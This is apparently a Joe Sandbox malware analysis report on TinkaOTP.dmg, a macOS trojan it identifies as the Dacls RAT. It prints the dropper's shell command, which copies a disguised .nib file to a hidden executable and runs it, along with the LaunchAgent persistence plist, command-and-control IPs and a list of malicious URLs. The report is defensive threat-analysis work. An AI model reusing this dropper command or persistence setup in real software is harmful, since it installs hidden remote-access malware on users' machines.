Play interactive tour

Edit tour

Analysis Report TinkaOTP.dmg

Overview

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	101851
Start date:	06.05.2020
Start time:	15:15:39
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 3m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	TinkaOTP.dmg
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Run name:	Potential for more IOCs and behavior
Detection:	MAL
Classification:	mal60.troj.evad.macDMG@0/4@0/0

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	60	0 - 100	Report FP / FN	false	Dacls

Classification Spiderchart

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Hidden Files and Directories21	Launch Daemon1	Masquerading1	Credential Dumping	System Information Discovery51	Application Deployment Software	Data from Local System	Data Compressed	Standard Cryptographic Protocol1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media	Service Execution	Launch Daemon1	Plist Modification1	Hidden Files and Directories21	Network Sniffing	Application Window Discovery	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Windows Management Instrumentation	LC_LOAD_DYLIB Addition1	Path Interception	Scripting1	Input Capture	Query Registry	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Custom Cryptographic Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Drive-by Compromise	Scheduled Task	Plist Modification1	DLL Search Order Hijacking	Plist Modification1	Credentials in Files	System Network Configuration Discovery	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication	SIM Card Swap		Premium SMS Toll Fraud
Exploit Public-Facing Application	Command-Line Interface	Launch Agent2	File System Permissions Weakness	Masquerading	Account Manipulation	Remote System Discovery	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Signature Overview

Click to jump to signature section

Networking:

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknown	TCP traffic detected without corresponding DNS query: 185.62.58.207

Urls found in memory or binary data

Show sources

Source: TinkaOTP.dmg

String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49375 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49379
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49375
Source: unknown	Network traffic detected: HTTP traffic on port 49379 -> 443

System Summary:

Classification label

Show sources

Source: classification engine

Classification label: mal60.troj.evad.macDMG@0/4@0/0

Persistence and Installation Behavior:

Executes hidden files

Show sources

Source: /bin/bash (PID: 18267)

Hidden file executed: /Users/ben/Library/.mina /Users/ben/Library/.mina

Jump to behavior

Writes Mach-O files to untypical directories

Show sources

Source: /bin/cp (PID: 18265)

64-bit Mach-O written to unusual path: /Users/ben/Library/.mina

Jump to dropped file

Changes permissions of written Mach-O files

Show sources

Source: /bin/cp (PID: 18265)

Permissions modified for written 64-bit Mach-O /Users/ben/Library/.mina: bits: - usr: r grp: r all: rw

Jump to dropped file

Creates hidden files, links and/or directories

Show sources

Source: /bin/cp (PID: 18265)

Hidden File created: /Users/ben/Library/.mina

Jump to behavior

Executes commands using a shell command-line interpreter

Show sources

Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)

Shell command executed: /bin/bash -c cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1

Jump to behavior

Executes the "chmod" command used to modify permissions

Show sources

Source: /bin/bash (PID: 18266)

Chmod executable: /bin/chmod -> chmod +x /Users/ben/Library/.mina

Jump to behavior

Reads launchservices plist files

Show sources

Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)

Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist

Jump to behavior

Reads user launchservices plist file containing default apps for corresponding file types

Show sources

Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)

Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist

Jump to behavior

Writes 64-bit Mach-O files to disk

Show sources

Source: /bin/cp (PID: 18265)

File written: /Users/ben/Library/.mina

Jump to dropped file

Reads data from the local random generator

Show sources

Source: /Users/ben/Library/.mina (PID: 18268)

Random device file read: /dev/urandom

Jump to behavior

Uses AppleKeyboardLayouts bundle containing keyboard layouts

Show sources

Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)

AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Jump to behavior

Writes property list (.plist) files to disk

Show sources

Source: /Users/ben/Library/.mina (PID: 18267)

XML plist file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plist

Jump to dropped file

Boot Survival:

Creates memory-persistent launch services

Show sources

Source: /Users/ben/Library/.mina (PID: 18267)

Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plist

Jump to behavior

Creates user-wide 'launchd' managed services aka launch agents

Show sources

Source: /Users/ben/Library/.mina (PID: 18267)

Launch agent created File created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plist

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Creates hidden Mach-O files

Show sources

Source: /bin/cp (PID: 18265)

Hidden Mach-O file written: Mach-O 64 bit: /Users/ben/Library/.mina

Jump to dropped file

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)

Show sources

Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)

Sysctl read request: kern.safeboot (1.66)

Jump to behavior

Language, Device and Operating System Detection:

Reads hardware related sysctl values

Show sources

Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)

Sysctl read request: hw.availcpu (6.25)

Jump to behavior

Reads the systems hostname

Show sources

Source: /bin/bash (PID: 18264)

Sysctl requested: kern.hostname (1.10)

Jump to behavior

Reads the system or server version plist file

Show sources

Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)

System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Jump to behavior

Stealing of Sensitive Information:

Yara detected Dacls RAT

Show sources

Source: Yara match	File source: SubMenu.nib, type: SAMPLE
Source: Yara match	File source: /Users/ben/Library/.mina, type: DROPPED

Remote Access Functionality:

Yara detected Dacls RAT

Show sources

Source: Yara match	File source: SubMenu.nib, type: SAMPLE
Source: Yara match	File source: /Users/ben/Library/.mina, type: DROPPED

Malware Configuration

No configs have been found

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Runtime Messages

Command:	open "/Volumes/TinkaOTP/TinkaOTP.app" --args
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
SubMenu.nib	JoeSecurity_Dacls	Yara detected Dacls RAT	Joe Security

PCAP (Network Traffic)

No yara matches

Dropped Files

Source	Rule	Description	Author	Strings
/Users/ben/Library/.mina	JoeSecurity_Dacls	Yara detected Dacls RAT	Joe Security

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	https://t.co/y27Kr7Z7wX	Get hash	malicious	Browse	104.244.42.133
	https://linkprotect.cudasvc.com/url?a=%68%74%74%70%73%3A%2F%2F%74%2E%63%6F%2F%4E%76%38%72%49%30%32%5A%45%4F&c=E	Get hash	malicious	Browse	104.244.42.69
	https://f002.backblazeb2.com/file/wyl2ruk25cvbtv9xps81of/e56dfiimp/z0etj6poadf9y2sev602k0.html?email=undefine#abosschaart@pzem.nl	Get hash	malicious	Browse	192.229.221.185
	oBfsC4t10n2.xls	Get hash	malicious	Browse	52.114.77.164
	https://peenni.xyz/Admin/login.php?email=nadia.abbassi@swisslife.fr&name=%20ABBASSI%20Nadia	Get hash	malicious	Browse	148.72.65.62
	Documentation.xls	Get hash	malicious	Browse	185.140.53.48
	Documentation.xls	Get hash	malicious	Browse	104.18.48.20
	Eventbot.jar	Get hash	malicious	Browse	74.125.143.188
	jazz.exe	Get hash	malicious	Browse	1.3.99.0
	#Ud83d#UdcdeAeriestechnology.com Audio_4544.htm	Get hash	malicious	Browse	23.111.9.35
	SWIFT.exe	Get hash	malicious	Browse	185.140.53.158
	Aeriestechnology.com #Ud83d#UdcdeAudio_4544.htm	Get hash	malicious	Browse	180.150.250.218
	http://chng.it/nQRBfpjZD7	Get hash	malicious	Browse	35.186.220.184
	https://us8.campaign-archive.com/?u=03a536b6064301f5b9e56a1a5&id=a70d4c614e	Get hash	malicious	Browse	151.101.60.193
	https://estilomagnolia.com.ar/COVID-19.html	Get hash	malicious	Browse	192.185.188.168
	ace-stream-3-1-1-multi-win.exe	Get hash	malicious	Browse	138.201.84.72
	http://woogle.com/	Get hash	malicious	Browse	192.161.187.200
	https://xurl.es/bz56k	Get hash	malicious	Browse	104.16.132.229
	https://h8.t.hubspotemail.net/e2t/c/W7HmM9G14pJ7vN919GD-s5dBr0/W2_cz8f7Rk0N3W1Fc8Qv3D1Q0k0/5/f18dQhb0S9r79jx7M-W4GcZlG2wqbgQW4VSVT16bzZrwVRqVDC64DbVMW4NfVNZ9gpw4MW4PfvXg7v1hvYW7NyyjW8mv-3QW8mQCxy79mDVRV5Gp8s83GbYkW8hGL-k9bVLmzW7sLthR9djgzWW5LMnrb2c2bg7W79-X3K8gvx_4W6YmB6S7JtTqnW8mnw907bjnYCW3m1z8F8h6MtRW5mK37h1h4tZfW6s1-1C3SQgn2W3_CV247WvZcbW41TlcR3Tw-1xW3DrmCK2r5Kr4W2HT8mr6kn_xzMz74JcYSX-5W7m_B1R5c8d-SW3788pM7mNTCXW3Kh5V35QKjhhW3fFMTv8djpxyW9j8Kdg96NrfmW4FxPX82_GnqFW7c9wJr2JxmcrW4LQhN49hxfTXN5tRRv9cyhfHW3s3_hw87Z8vpW37Fssp5vfyNnW8R6rGC6cb1QjW3sBXv68yxkN1W49kJ936fMryTN11rnNb4VjkzW6Mzk0P8pPvtYV1T_l07TncnMW31GHfx12y5tcW5QHPjY7f1VhbVb5y-_27k6TlW1jVk8n2LKhTNN3Z1mnX9XfwsD7s2GRzp-nf2KWKpv03	Get hash	malicious	Browse	13.224.197.9
	https://1drv.ms/b/s!Arr0ZL_iF4eIkzIyxU6TJfnJdfLL?e=qoUvoJ	Get hash	malicious	Browse	172.217.168.66
unknown	https://t.co/y27Kr7Z7wX	Get hash	malicious	Browse	104.244.42.133
	https://linkprotect.cudasvc.com/url?a=%68%74%74%70%73%3A%2F%2F%74%2E%63%6F%2F%4E%76%38%72%49%30%32%5A%45%4F&c=E	Get hash	malicious	Browse	104.244.42.69
	https://f002.backblazeb2.com/file/wyl2ruk25cvbtv9xps81of/e56dfiimp/z0etj6poadf9y2sev602k0.html?email=undefine#abosschaart@pzem.nl	Get hash	malicious	Browse	192.229.221.185
	oBfsC4t10n2.xls	Get hash	malicious	Browse	52.114.77.164
	https://peenni.xyz/Admin/login.php?email=nadia.abbassi@swisslife.fr&name=%20ABBASSI%20Nadia	Get hash	malicious	Browse	148.72.65.62
	Documentation.xls	Get hash	malicious	Browse	185.140.53.48
	Documentation.xls	Get hash	malicious	Browse	104.18.48.20
	Eventbot.jar	Get hash	malicious	Browse	74.125.143.188
	jazz.exe	Get hash	malicious	Browse	1.3.99.0
	#Ud83d#UdcdeAeriestechnology.com Audio_4544.htm	Get hash	malicious	Browse	23.111.9.35
	SWIFT.exe	Get hash	malicious	Browse	185.140.53.158
	Aeriestechnology.com #Ud83d#UdcdeAudio_4544.htm	Get hash	malicious	Browse	180.150.250.218
	http://chng.it/nQRBfpjZD7	Get hash	malicious	Browse	35.186.220.184
	https://us8.campaign-archive.com/?u=03a536b6064301f5b9e56a1a5&id=a70d4c614e	Get hash	malicious	Browse	151.101.60.193
	https://estilomagnolia.com.ar/COVID-19.html	Get hash	malicious	Browse	192.185.188.168
	ace-stream-3-1-1-multi-win.exe	Get hash	malicious	Browse	138.201.84.72
	http://woogle.com/	Get hash	malicious	Browse	192.161.187.200
	https://xurl.es/bz56k	Get hash	malicious	Browse	104.16.132.229
	https://h8.t.hubspotemail.net/e2t/c/W7HmM9G14pJ7vN919GD-s5dBr0/W2_cz8f7Rk0N3W1Fc8Qv3D1Q0k0/5/f18dQhb0S9r79jx7M-W4GcZlG2wqbgQW4VSVT16bzZrwVRqVDC64DbVMW4NfVNZ9gpw4MW4PfvXg7v1hvYW7NyyjW8mv-3QW8mQCxy79mDVRV5Gp8s83GbYkW8hGL-k9bVLmzW7sLthR9djgzWW5LMnrb2c2bg7W79-X3K8gvx_4W6YmB6S7JtTqnW8mnw907bjnYCW3m1z8F8h6MtRW5mK37h1h4tZfW6s1-1C3SQgn2W3_CV247WvZcbW41TlcR3Tw-1xW3DrmCK2r5Kr4W2HT8mr6kn_xzMz74JcYSX-5W7m_B1R5c8d-SW3788pM7mNTCXW3Kh5V35QKjhhW3fFMTv8djpxyW9j8Kdg96NrfmW4FxPX82_GnqFW7c9wJr2JxmcrW4LQhN49hxfTXN5tRRv9cyhfHW3s3_hw87Z8vpW37Fssp5vfyNnW8R6rGC6cb1QjW3sBXv68yxkN1W49kJ936fMryTN11rnNb4VjkzW6Mzk0P8pPvtYV1T_l07TncnMW31GHfx12y5tcW5QHPjY7f1VhbVb5y-_27k6TlW1jVk8n2LKhTNN3Z1mnX9XfwsD7s2GRzp-nf2KWKpv03	Get hash	malicious	Browse	13.224.197.9
	https://1drv.ms/b/s!Arr0ZL_iF4eIkzIyxU6TJfnJdfLL?e=qoUvoJ	Get hash	malicious	Browse	172.217.168.66

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

system is mac-mojave

xpcproxy New Fork (PID: 18263, Parent: 1)

TinkaOTP (MD5: 02670c82d74d0362a5fafdf3f42904ef) Arguments: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP

bash New Fork (PID: 18264, Parent: 18263)

bash New Fork (PID: 18265, Parent: 18264)

cp (MD5: b78b44666e242cb82db43e70116add92) Arguments: cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/ben/Library/.mina

bash New Fork (PID: 18266, Parent: 18264)

chmod (MD5: d7df83ea3a49de5d07e0c1730e910852) Arguments: chmod +x /Users/ben/Library/.mina

bash New Fork (PID: 18267, Parent: 18264)

.mina (MD5: f05437d510287448325bac98a1378de1) Arguments: /Users/ben/Library/.mina

.mina New Fork (PID: 18268, Parent: 18267)

cleanup

Created / dropped Files

/Users/ben/Library/.mina Download File
Process:	/bin/cp
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Size (bytes):	673092
Entropy (8bit):	6.231249849549832
Encrypted:	false
MD5:	F05437D510287448325BAC98A1378DE1
SHA1:	FA3DEB60B8A2EAA29A7DCCF14BEE6ADAE81F442F
SHA-256:	846D8647D27A0D729DF40B13A644F3BFFDC95F6D0E600F2195C85628D59F1DC6
SHA-512:	466999585E7B09E729DEF6E13C719B656BA7EE9CA43EA32C8FB3A6177DE81A75CAF9BD5EB0C0AC172C2B7FEA3C1AA57D10349FF98AAC472FE2FFAFDE8CD30165
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Dacls, Description: Yara detected Dacls RAT, Source: /Users/ben/Library/.mina, Author: Joe Security
Reputation:	low
Preview:	....................h..... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..........@.......x~......@...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........d...............d...............................__const.........__TEXT.................dA.....................................__cstring.......__TEXT..........T........e......T...............................__ustring.......__TEXT..........V<..............V<..............................__unwind_info...__TEXT..........T=..............T=..............................__eh_frame......__TEXT..........hk.......T......hk......................................__DATA_CONST............. ............... ......................__got...........__DATA_CONST............H...........................r...........__const.........__DATA_CONST....

/Users/ben/Library/Caches/com.apple.appstore.db Download File
Process:	/Users/ben/Library/.mina
File Type:	data
Size (bytes):	109164
Entropy (8bit):	7.998274026308568
Encrypted:	true
MD5:	7D8B6456DC5E20AC49C280B784C085D1
SHA1:	D95B70DBE4BF55C9CEE6C433FD59187046C1011F
SHA-256:	8074471BCF8DAD702F5E0E7D7D112AD08D133E97A64D5CD97AD251AFE5DCE6A2
SHA-512:	C51E874A7986B467D7E01DC1891F01D21B3472AB5E442E1BA4D7D3754BEBF5DB7532C2D2FDF82C785AE424ACE40D14238023011D75F79BAB758EB8F9EAF1D59D
Malicious:	false
Reputation:	low
Preview:	>.a..<r6].y.2m.b.u4..Y.b...L$....Y.4CQe......^y=u".E.S.#....!R.i...k....].z.A..X,.'....v....h._l.y.h..LgS....)../..h.c.1.V....d......-3...+....1.y.f..7.u.Y.E.CH.o...u.+..'.Z.....@..YG.uy.A.u0..."......tf.q..&puJS..m...5"<...[.....L..R])......kL..[.."R..x(..!...x.(u..."...n5...........k.D.....(..B...8a:r.m........U....-...b...P9..Hp4.7..eL6~.....276-..z..=....w"yW....i.O`wqF<$.>..h{s.....I..E@!;]..c....)r.....R...0Vo..`(%......,...).......8j..v...NQ.f1\|.....=Q.....L.d.L:j[...UI.c.H...7pd....z_f.Y.u..[..Mv..9.&.uA.Af.8....e..........sx....D.`.Gr..}.... .....K%*[...q..:~....^..r%".d.k..i.v.)oF........I%4.0.\.....]:....A.W....'4.$..&..Y._....^m..xsB..B......,9.D..xX`..%wd....[l..$C;.T.ac:uM..L..(H..G..].0..'...w.....\|....<.]..~.g.E..Mi.A.o.m...r..O..}.....;).^.]q1w.Xj:q.....Q%..!.A......Z........n'...u...".....).'.2..y.NKy...ZBF.;.O9.xQgzy..c.b..W..m....g.!.f..5.C.$.b.VC...l....)M.B-.8..\.....S.c..G.)....,..e.Xd.C.$"...@...

/Users/ben/Library/LaunchAgents/com.aex-loop.agent.plist Download File
Process:	/Users/ben/Library/.mina
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Size (bytes):	439
Entropy (8bit):	5.230362728676761
Encrypted:	false
MD5:	5E7247AA69F17909F527D4871234F16B
SHA1:	E50DECA8D0FD1B36620477CD8C1DC6C23836C566
SHA-256:	5012C40ED7D3CE78A0759618FC7AD675CC19FF4A1460CE7B60F27BA85D366E5D
SHA-512:	D49E5F3FAAA9893A69F5CB5B37D9CEC6AC4A67F546B6764940BF94936509EEA0312268AB10BA8B36E0DF0BB0E994A06BAE40687EBBF87FB406D328BCCCD05F15
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>Label</key>...<string>com.aex-loop.agent</string>...<key>ProgramArguments</key>...<array>....<string>/Users/ben/Library/.mina</string>....<string>daemon</string>...</array>...<key>KeepAlive</key>...<false/>...<key>RunAtLoad</key>...<true/>..</dict>..</plist>

/dev/null Download File
Process:	/Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
File Type:	ASCII text
Size (bytes):	66
Entropy (8bit):	4.864480437829257
Encrypted:	false
MD5:	765D5321E46F1D94AB56E6712713C78E
SHA1:	F7DCEE7B667AC451A5D9A29FF013A2F6C24AAE44
SHA-256:	47263C3026CA7E650DFFC8D27112A3580B97EC52BC332B86E741D6E9D116B797
SHA-512:	C3B9E8657A1FBBA24656DB7C676F22D137A91D0C328D8EA765401F58D58CB954EFBFD79873C55D091D30CC124D96B92E0BC19B76D3C5CC61526A1A1A1DA15855
Malicious:	false
Reputation:	low
Preview:	2020-05-06 17:16:24.059 TinkaOTP[18263:77471] ApplePersistence=NO.

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
185.62.58.207	Netherlands		62370	unknown	false
67.43.239.146	Canada		36666	unknown	false

Static File Info

General
File type:	zlib compressed data
Entropy (8bit):	7.994558906989309
TrID:	Disk Image (Macintosh), zlib, GPT (10001/1) 90.90% XMill compressed XML (1001/1) 9.10%
File name:	TinkaOTP.dmg
File size:	6462928
MD5:	81f8f0526740b55fe484c42126cd8396
SHA1:	fe83d95afce63e935dbe22aef40a164cee34f4e5
SHA256:	899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53
SHA512:	751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a
SSDEEP:	196608:py41rDVac5C/ohoS4AOPqIsuaB8jA5yqTZb:py4xD4HBASqIsBF
File Content Preview:	x...!........&..h...h....... x...3X....=<...(...../..&.,&..-."..\|^F.......Yy~...A..;uO.u..g..'...J.;... @....... @....... @....... @....... @....... @....... @....... @......uH..x.su.T.p..a``d.a``X....H.y.`7.B+A..P~....U<....<.4.....*...A.^..4 5..y......5

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 6, 2020 15:16:25.420222998 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:25.520539045 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:16:25.520975113 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:25.521297932 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:25.634637117 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:16:25.634663105 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:16:25.635191917 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:25.646831036 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:25.805166960 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:16:25.805373907 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:25.905936003 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:16:25.906196117 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:25.906235933 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:26.281728983 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:26.382430077 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:16:26.914593935 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:16:26.915062904 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:26.915129900 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:28.582882881 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:16:28.683532000 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:17:41.155874968 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:17:41.156137943 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:17:41.156182051 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:17:41.156224966 CEST	49375	443	192.168.0.51	67.43.239.146
May 6, 2020 15:17:41.269670010 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:17:41.279517889 CEST	443	49375	67.43.239.146	192.168.0.51
May 6, 2020 15:17:51.189356089 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.234394073 CEST	443	49379	185.62.58.207	192.168.0.51
May 6, 2020 15:17:51.234823942 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.235049963 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.270240068 CEST	443	49379	185.62.58.207	192.168.0.51
May 6, 2020 15:17:51.270263910 CEST	443	49379	185.62.58.207	192.168.0.51
May 6, 2020 15:17:51.270637035 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.281897068 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.306356907 CEST	443	49379	185.62.58.207	192.168.0.51
May 6, 2020 15:17:51.306710005 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.322312117 CEST	443	49379	185.62.58.207	192.168.0.51
May 6, 2020 15:17:51.322710991 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.322791100 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.338289976 CEST	443	49379	185.62.58.207	192.168.0.51
May 6, 2020 15:17:51.338706970 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.338766098 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.368772030 CEST	443	49379	185.62.58.207	192.168.0.51
May 6, 2020 15:17:51.369188070 CEST	49379	443	192.168.0.51	185.62.58.207
May 6, 2020 15:17:51.399929047 CEST	443	49379	185.62.58.207	192.168.0.51

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 6, 2020 15:16:25.634637117 CEST	67.43.239.146	443	192.168.0.51	49375	CN=uxusbtddbwgsz.org, OU=ZHL Co. Ltd, O=JLR Co. Ltd, L=Sampson, ST=Peoria, C=US	CN=uxusbtddbwgsz.org, OU=ZHL Co. Ltd, O=JLR Co. Ltd, L=Sampson, ST=Peoria, C=US	Sat Mar 21 06:44:21 CET 2020	Tue Mar 19 06:44:21 CET 2030	771,49196-49195-49200-49199-159-158-52393-52392-52394-49191-49187-49192-49188-49162-49161-49172-49171-107-103-57-51-52244-52243-52245,13-11-10-23,25-24-23-21-19-16,0	f8c52bdcd6feb46ef8a6d31d73ab457f
May 6, 2020 15:17:51.270240068 CEST	185.62.58.207	443	192.168.0.51	49379	CN=bvwaewachdyzpb.org, OU=JPO Co. Ltd, O=VRZ Co. Ltd, L=St. Clair, ST=Manitowoc, C=US	CN=bvwaewachdyzpb.org, OU=JPO Co. Ltd, O=VRZ Co. Ltd, L=St. Clair, ST=Manitowoc, C=US	Sat Mar 21 00:48:59 CET 2020	Tue Mar 19 00:48:59 CET 2030	771,49196-49195-49200-49199-159-158-52393-52392-52394-49191-49187-49192-49188-49162-49161-49172-49171-107-103-57-51-52244-52243-52245,13-11-10-23,25-24-23-21-19-16,0	f8c52bdcd6feb46ef8a6d31d73ab457f

System Behavior

Analysis Process: xpcproxy PID: 18263 Parent PID: 1

General

Start time:	15:16:23
Start date:	06/05/2020
